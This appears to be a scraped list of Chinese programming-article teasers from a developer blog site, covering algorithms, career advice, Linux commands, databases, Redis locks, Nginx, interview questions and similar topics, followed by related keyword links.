由于我之前一直强调数据结构以及算法学习的重要性,所以就有一些读者经常问我,数据结构与算法应该要学习到哪个程度呢?,说实话,这个问题我不知道要怎么回答你,主要取决于你想学习到哪些程度,不过针对这个问题,我稍微总结一下我学过的算法知识点,以及我觉得值得学习的算法。这些算法与数据结构的学习大多数是零散的,并没有一本把他们全部覆盖的书籍。下面是我觉得值得学习的一些算法以及数据结构,当然,我也会整理一些看过...
有哪些让程序员受益终生的建议
从业五年多,辗转两个大厂,出过书,创过业,从技术小白成长为基层管理,联合几个业内大牛回答下这个问题,希望能帮到大家,记得帮我点赞哦。 敲黑板!!!读了这篇文章,你将知道如何才能进大厂,如何实现财务自由,如何在工作中游刃有余,这篇文章很长,但绝对是精品,记得帮我点赞哦!!!! 一腔肺腑之言,能看进去多少,就看你自己了!!! 目录: 在校生篇: 为什么要尽量进大厂? 如何选择语言及方...
大学四年自学走来,这些私藏的实用工具/学习网站我贡献出来了
大学四年,看课本是不可能一直看课本的了,对于学习,特别是自学,善于搜索网上的一些资源来辅助,还是非常有必要的,下面我就把这几年私藏的各种资源,网站贡献出来给你们。主要有:电子书搜索、实用工具、在线视频学习网站、非视频学习网站、软件下载、面试/求职必备网站。 注意:文中提到的所有资源,文末我都给你整理好了,你们只管拿去,如果觉得不错,转发、分享就是最大的支持了。 一、电子书搜索 对于大部分程序员...
linux系列之常用运维命令整理笔录
本博客记录工作中需要的linux运维命令,大学时候开始接触linux,会一些基本操作,可是都没有整理起来,加上是做开发,不做运维,有些命令忘记了,所以现在整理成博客,当然vi,文件操作等就不介绍了,慢慢积累一些其它拓展的命令,博客不定时更新 free -m 其中:m表示兆,也可以用g,注意都要小写 Men:表示物理内存统计 total:表示物理内存总数(total=used+free) use...
比特币原理详解
一、什么是比特币 比特币是一种电子货币,是一种基于密码学的货币,在2008年11月1日由中本聪发表比特币白皮书,文中提出了一种去中心化的电子记账系统,我们平时的电子现金是银行来记账,因为银行的背后是国家信用。去中心化电子记账系统是参与者共同记账。比特币可以防止主权危机、信用风险。其好处不多做赘述,这一层面介绍的文章很多,本文主要从更深层的技术原理角度进行介绍。 二、问题引入 假设现有4个人...
程序员接私活怎样防止做完了不给钱?
首先跟大家说明一点,我们做 IT 类的外包开发,是非标品开发,所以很有可能在开发过程中会有这样那样的需求修改,而这种需求修改很容易造成扯皮,进而影响到费用支付,甚至出现做完了项目收不到钱的情况。 那么,怎么保证自己的薪酬安全呢? 我们在开工前,一定要做好一些证据方面的准备(也就是“讨薪”的理论依据),这其中最重要的就是需求文档和验收标准。一定要让需求方提供这两个文档资料作为开发的基础。之后开发...
网页实现一个简单的音乐播放器(大佬别看。(⊙﹏⊙))
今天闲着无事,就想写点东西。然后听了下歌,就打算写个播放器。 于是乎用h5 audio的加上js简单的播放器完工了。 演示地点演示 html代码如下` music 这个年纪 七月的风 音乐 ` 然后就是css`*{ margin: 0; padding: 0; text-decoration: none; list-...
Python十大装B语法
Python 是一种代表简单思想的语言,其语法相对简单,很容易上手。不过,如果就此小视 Python 语法的精妙和深邃,那就大错特错了。本文精心筛选了最能展现 Python 语法之精妙的十个知识点,并附上详细的实例代码。如能在实战中融会贯通、灵活使用,必将使代码更为精炼、高效,同时也会极大提升代码B格,使之看上去更老练,读起来更优雅。
数据库优化 - SQL优化
以实际SQL入手,带你一步一步走上SQL优化之路!
2019年11月中国大陆编程语言排行榜
2019年11月2日,我统计了某招聘网站,获得有效程序员招聘数据9万条。针对招聘信息,提取编程语言关键字,并统计如下: 编程语言比例 rank pl_ percentage 1 java 33.62% 2 cpp 16.42% 3 c_sharp 12.82% 4 javascript 12.31% 5 python 7.93% 6 go 7.25% 7 p...
通俗易懂地给女朋友讲:线程池的内部原理
餐盘在灯光的照耀下格外晶莹洁白,女朋友拿起红酒杯轻轻地抿了一小口,对我说:“经常听你说线程池,到底线程池到底是个什么原理?”
《奇巧淫技》系列-python!!每天早上八点自动发送天气预报邮件到QQ邮箱
将代码部署服务器,每日早上定时获取到天气数据,并发送到邮箱。 也可以说是一个小型人工智障。 知识可以运用在不同地方,不一定非是天气预报。
经典算法(5)杨辉三角
杨辉三角 是经典算法,这篇博客对它的算法思想进行了讲解,并有完整的代码实现。
英特尔不为人知的 B 面
从 PC 时代至今,众人只知在 CPU、GPU、XPU、制程、工艺等战场中,英特尔在与同行硬件芯片制造商们的竞争中杀出重围,且在不断的成长进化中,成为全球知名的半导体公司。殊不知,在「刚硬」的背后,英特尔「柔性」的软件早已经做到了全方位的支持与支撑,并持续发挥独特的生态价值,推动产业合作共赢。 而对于这一不知人知的 B 面,很多人将其称之为英特尔隐形的翅膀,虽低调,但是影响力却不容小觑。 那么,在...
腾讯算法面试题:64匹马8个跑道需要多少轮才能选出最快的四匹?
昨天,有网友私信我,说去阿里面试,彻底的被打击到了。问了为什么网上大量使用ThreadLocal的源码都会加上private static?他被难住了,因为他从来都没有考虑过这个问题。无独有偶,今天笔者又发现有网友吐槽了一道腾讯的面试题,我们一起来看看。 腾讯算法面试题:64匹马8个跑道需要多少轮才能选出最快的四匹? 在互联网职场论坛,一名程序员发帖求助到。二面腾讯,其中一个算法题:64匹...
面试官:你连RESTful都不知道我怎么敢要你?
干货,2019 RESTful最贱实践
为啥国人偏爱Mybatis,而老外喜欢Hibernate/JPA呢?
关于SQL和ORM的争论,永远都不会终止,我也一直在思考这个问题。昨天又跟群里的小伙伴进行了一番讨论,感触还是有一些,于是就有了今天这篇文。 声明:本文不会下关于Mybatis和JPA两个持久层框架哪个更好这样的结论。只是摆事实,讲道理,所以,请各位看官勿喷。 一、事件起因 关于Mybatis和JPA孰优孰劣的问题,争论已经很多年了。一直也没有结论,毕竟每个人的喜好和习惯是大不相同的。我也看...
白话阿里巴巴Java开发手册高级篇
不久前,阿里巴巴发布了《阿里巴巴Java开发手册》,总结了阿里巴巴内部实际项目开发过程中开发人员应该遵守的研发流程规范,这些流程规范在一定程度上能够保证最终的项目交付质量,通过在时间中总结模式,并推广给广大开发人员,来避免研发人员在实践中容易犯的错误,确保最终在大规模协作的项目中达成既定目标。 无独有偶,笔者去年在公司里负责升级和制定研发流程、设计模板、设计标准、代码标准等规范,并在实际工作中进行...
SQL-小白最佳入门sql查询一
不要偷偷的查询我的个人资料,即使你再喜欢我,也不要这样,真的不好;
redis分布式锁,面试官请随便问,我都会
文章有点长并且绕,先来个图片缓冲下! 前言 现在的业务场景越来越复杂,使用的架构也就越来越复杂,分布式、高并发已经是业务要求的常态。像腾讯系的不少服务,还有CDN优化、异地多备份等处理。 说到分布式,就必然涉及到分布式锁的概念,如何保证不同机器不同线程的分布式锁同步呢? 实现要点 互斥性,同一时刻,智能有一个客户端持有锁。 防止死锁发生,如果持有锁的客户端崩溃没有主动释放锁,也要保证锁可以正常释...
项目中的if else太多了,该怎么重构?
介绍 最近跟着公司的大佬开发了一款IM系统,类似QQ和微信哈,就是聊天软件。我们有一部分业务逻辑是这样的 if (msgType = "文本") { // dosomething } else if(msgType = "图片") { // doshomething } else if(msgType = "视频") { // doshomething } else { // doshom...
Nginx 原理和架构
Nginx 是一个免费的,开源的,高性能的 HTTP 服务器和反向代理,以及 IMAP / POP3 代理服务器。Nginx 以其高性能,稳定性,丰富的功能,简单的配置和低资源消耗而闻名。 Nginx 的整体架构 Nginx 里有一个 master 进程和多个 worker 进程。master 进程并不处理网络请求,主要负责调度工作进程:加载配置、启动工作进程及非停升级。worker 进程负责处...
Python 编程开发 实用经验和技巧
Python是一门很灵活的语言,也有很多实用的方法,有时候实现一个功能可以用多种方法实现,我这里总结了一些常用的方法和技巧,包括小数保留指定位小数、判断变量的数据类型、类方法@classmethod、制表符中文对齐、遍历字典、datetime.timedelta的使用等,会持续更新......
YouTube排名第一的励志英文演讲《Dream(梦想)》
Idon’t know what that dream is that you have, I don't care how disappointing it might have been as you've been working toward that dream,but that dream that you’re holding in your mind, that it’s po...
“狗屁不通文章生成器”登顶GitHub热榜,分分钟写出万字形式主义大作
一、垃圾文字生成器介绍 最近在浏览GitHub的时候,发现了这样一个骨骼清奇的雷人项目,而且热度还特别高。 项目中文名:狗屁不通文章生成器 项目英文名:BullshitGenerator 根据作者的介绍,他是偶尔需要一些中文文字用于GUI开发时测试文本渲染,因此开发了这个废话生成器。但由于生成的废话实在是太过富于哲理,所以最近已经被小伙伴们给玩坏了。 他的文风可能是这样的: 你发现,...
程序员:我终于知道post和get的区别
是一个老生常谈的话题,然而随着不断的学习,对于以前的认识有很多误区,所以还是需要不断地总结的,学而时习之,不亦说乎
《程序人生》系列-这个程序员只用了20行代码就拿了冠军
你知道的越多,你不知道的越多 点赞再看,养成习惯GitHub上已经开源https://github.com/JavaFamily,有一线大厂面试点脑图,欢迎Star和完善 前言 这一期不算《吊打面试官》系列的,所有没前言我直接开始。 絮叨 本来应该是没有这期的,看过我上期的小伙伴应该是知道的嘛,双十一比较忙嘛,要值班又要去帮忙拍摄年会的视频素材,还得搞个程序员一天的Vlog,还要写BU...
加快推动区块链技术和产业创新发展,2019可信区块链峰会在京召开
11月8日,由中国信息通信研究院、中国通信标准化协会、中国互联网协会、可信区块链推进计划联合主办,科技行者协办的2019可信区块链峰会将在北京悠唐皇冠假日酒店开幕。   区块链技术被认为是继蒸汽机、电力、互联网之后,下一代颠覆性的核心技术。如果说蒸汽机释放了人类的生产力,电力解决了人类基本的生活需求,互联网彻底改变了信息传递的方式,区块链作为构造信任的技术有重要的价值。   1...
Java世界最常用的工具类库
Apache Commons Apache Commons有很多子项目 Google Guava 参考博客
程序员把地府后台管理系统做出来了,还有3.0版本!12月7号最新消息:已在开发中有github地址
第一幕:缘起 听说阎王爷要做个生死簿后台管理系统,我们派去了一个程序员…… 996程序员做的梦: 第一场:团队招募 为了应对地府管理危机,阎王打算找“人”开发一套地府后台管理系统,于是就在地府总经办群中发了项目需求。 话说还是中国电信的信号好,地府都是满格,哈哈!!! 经常会有外行朋友问:看某网站做的不错,功能也简单,你帮忙做一下? 而这次,面对这样的需求,这个程序员...
网易云6亿用户音乐推荐算法
网易云音乐是音乐爱好者的集聚地,云音乐推荐系统致力于通过 AI 算法的落地,实现用户千人千面的个性化推荐,为用户带来不一样的听歌体验。 本次分享重点介绍 AI 算法在音乐推荐中的应用实践,以及在算法落地过程中遇到的挑战和解决方案。 将从如下两个部分展开: AI算法在音乐推荐中的应用 音乐场景下的 AI 思考 从 2013 年 4 月正式上线至今,网易云音乐平台持续提供着:乐屏社区、UGC...
8年经验面试官详解 Java 面试秘诀
作者 |胡书敏 责编 | 刘静 出品 | CSDN(ID:CSDNnews) 本人目前在一家知名外企担任架构师,而且最近八年来,在多家外企和互联网公司担任Java技术面试官,前后累计面试了有两三百位候选人。在本文里,就将结合本人的面试经验,针对Java初学者、Java初级开发和Java开发,给出若干准备简历和准备面试的建议。 Java程序员准备和投递简历的实...
面试官如何考察你的思维方式?
1.两种思维方式在求职面试中,经常会考察这种问题:北京有多少量特斯拉汽车?某胡同口的煎饼摊一年能卖出多少个煎饼?深圳有多少个产品经理?一辆公交车里能装下多少个乒乓球?一个正常成年人有多少根头发?这类估算问题,被称为费米问题,是以科学家费米命名的。为什么面试会问这种问题呢?这类问题能把两类人清楚地区分出来。一类是具有文科思维的人,擅长赞叹和模糊想象,它主要依靠的是人的第一反应和直觉,比如小孩...
全网阅读过20k的Java集合框架常见面试题总结!
本文为 SnailClimb 的原创,目前已经收录自我开源的 JavaGuide 中(61.5 k Star!【Java学习 面试指南】 一份涵盖大部分Java程序员所需要掌握的核心知识。欢迎 Star!)。 文末有我的公众号,公众号里有我最新整理的Java学习资料,免费分享。 这么好的文章,一定好先赞后看!!!建议养成这个好习惯!!爱你们!???? 剖析面试最常见问题之Java集合框架 当了...
17张图带你解析红黑树的原理!保证你能看懂!
二叉查找树 由于红黑树本质上就是一棵二叉查找树,所以在了解红黑树之前,咱们先来看下二叉查找树。 二叉查找树(Binary Search Tree),也称有序二叉树(ordered binary tree),排序二叉树(sorted binary tree),是指一棵空树或者具有下列性质的二叉树: 若任意结点的左子树不空,则左子树上所有结点的值均小于它的根结点的值; 若任意结点的...
so easy! 10行代码写个"狗屁不通"文章生成器
前几天,GitHub 有个开源项目特别火,只要输入标题就可以生成一篇长长的文章。 背后实现代码一定很复杂吧,里面一定有很多高深莫测的机器学习等复杂算法 不过,当我看了源代码之后 这程序不到50行 尽管我有多年的Python经验,但我竟然一时也没有看懂 当然啦,原作者也说了,这个代码也是在无聊中诞生的,平时撸码是不写中文变量名的, 中文...
知乎高赞:中国有什么拿得出手的开源软件产品?(整理自本人原创回答)
知乎高赞:中国有什么拿得出手的开源软件产品? 在知乎上,有个问题问“中国有什么拿得出手的开源软件产品(在 GitHub 等社区受欢迎度较好的)?” 事实上,还不少呢~ 本人于2019.7.6进行了较为全面的回答,对这些受欢迎的 Github 开源项目分类整理如下: 分布式计算、云平台相关工具类 1.SkyWalking,作者吴晟、刘浩杨 等等 仓库地址: apache/skywalking 更...
MySQL数据库总结
一、数据库简介 数据库(Database,DB)是按照数据结构来组织,存储和管理数据的仓库。 典型特征:数据的结构化、数据间的共享、减少数据的冗余度,数据的独立性。 关系型数据库:使用关系模型把数据组织到数据表(table)中。现实世界可以用数据来描述。 主流的关系型数据库产品:Oracle(Oracle)、DB2(IBM)、SQL Server(MS)、MySQL(Oracle)。 数据表:数...
记一次腾讯面试:进程之间究竟有哪些通信方式?如何通信? ---- 告别死记硬背
有一次面试的时候,被问到进程之间有哪些通信方式,不过由于之前没深入思考且整理过,说的并不好。想必大家也都知道进程有哪些通信方式,可是我猜很多人都是靠着”背“来记忆的,所以今天的这篇文章,讲给大家详细着讲解他们是如何通信的,让大家尽量能够理解他们之间的区别、优缺点等,这样的话,以后面试官让你举例子,你也能够顺手拈来。 1、管道 我们来看一条 Linux 的语句 netstat -tulnp | gr...
20行Python代码爬取王者荣耀全英雄皮肤
引言 王者荣耀大家都玩过吧,没玩过的也应该听说过,作为时下最火的手机MOBA游戏,咳咳,好像跑题了。我们今天的重点是爬取王者荣耀所有英雄的所有皮肤,而且仅仅使用20行Python代码即可完成。 准备工作 爬取皮肤本身并不难,难点在于分析,我们首先得得到皮肤图片的url地址,话不多说,我们马上来到王者荣耀的官网: 我们点击英雄资料,然后随意地选择一位英雄,接着F12打开调试台,找到英雄原皮肤的图片...
相关热词 c#委托 逆变与协变 c#新建一个项目 c#获取dll文件路径 c#子窗体调用主窗体事件 c# 拷贝目录 c# 调用cef 网页填表c#源代码 c#部署端口监听项目、 c#接口中的属性使用方法 c# 昨天
立即提问